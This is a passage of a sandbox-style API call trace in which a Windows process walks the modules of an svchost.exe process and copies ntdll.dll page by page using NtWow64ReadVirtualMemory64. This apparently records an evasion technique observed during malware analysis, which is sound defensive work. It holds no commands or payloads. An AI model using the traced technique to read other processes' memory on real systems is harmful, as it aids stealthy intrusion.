NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x25e000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0139.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0139.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8030c8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3e | out: Buffer=0x0, NumberOfBytesRead=0x3e) returned 0x0 [0139.945] StrRChrA (lpStart="C:\\Windows\\system32\\svchost.exe", lpEnd=0x0, wMatch=0x5c) returned="\\svchost.exe" [0139.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8032d0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8031c0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0139.945] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0139.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803910, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803aa0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0139.946] StrRChrA (lpStart="C:\\Windows\\system32\\KERNEL32.DLL", lpEnd=0x0, wMatch=0x5c) returned="\\KERNEL32.DLL" [0139.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803e10, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x803fa0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x44 | out: Buffer=0x0, NumberOfBytesRead=0x44) returned 0x0 [0139.946] StrRChrA (lpStart="C:\\Windows\\system32\\KERNELBASE.dll", lpEnd=0x0, wMatch=0x5c) returned="\\KERNELBASE.dll" [0139.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805270, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8038a0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3e | out: Buffer=0x0, NumberOfBytesRead=0x3e) returned 0x0 [0139.947] StrRChrA (lpStart="C:\\Windows\\system32\\sechost.dll", lpEnd=0x0, wMatch=0x5c) returned="\\sechost.dll" [0139.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805460, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x8055f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3c | out: Buffer=0x0, NumberOfBytesRead=0x3c) returned 0x0 [0139.947] StrRChrA (lpStart="C:\\Windows\\system32\\RPCRT4.dll", lpEnd=0x0, wMatch=0x5c) returned="\\RPCRT4.dll" [0139.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805880, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0139.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x805a10, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0139.948] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ucrtbase.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ucrtbase.dll" [0139.948] LocalFree (hMem=0x629120) returned 0x0 [0139.948] LocalFree (hMem=0x61df68) returned 0x0 [0139.948] lstrcmpiA (lpString1="svchost.exe", lpString2="NTDLL.DLL") returned 1 [0139.948] StrChrA (lpStart="svchost.exe", wMatch=0x2e) returned=".exe" [0139.948] lstrcmpiA (lpString1="svchost", lpString2="NTDLL.DLL") returned 1 [0139.948] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0139.948] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0139.948] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xb30000 [0139.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.950] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.950] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.950] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.950] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.952] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.952] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.952] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.953] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.953] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.953] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.954] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.979] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.979] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.979] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0139.986] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.060] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.061] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.061] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.062] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.100] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.101] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.101] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.101] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.102] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.102] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.102] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.102] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.103] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.103] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.103] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.103] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.104] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.104] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.104] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.105] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.105] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.106] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.114] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.115] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.115] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.115] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.116] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.116] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.117] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.117] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.117] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.208] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.209] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xb7d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xb7e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xb7f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.210] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xb80000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xb81000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.211] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xb82000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xb83000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xb84000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xb85000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.212] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xb86000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xb87000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xb88000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.213] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xb89000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xb8a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.214] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xb8b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xb8c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.215] 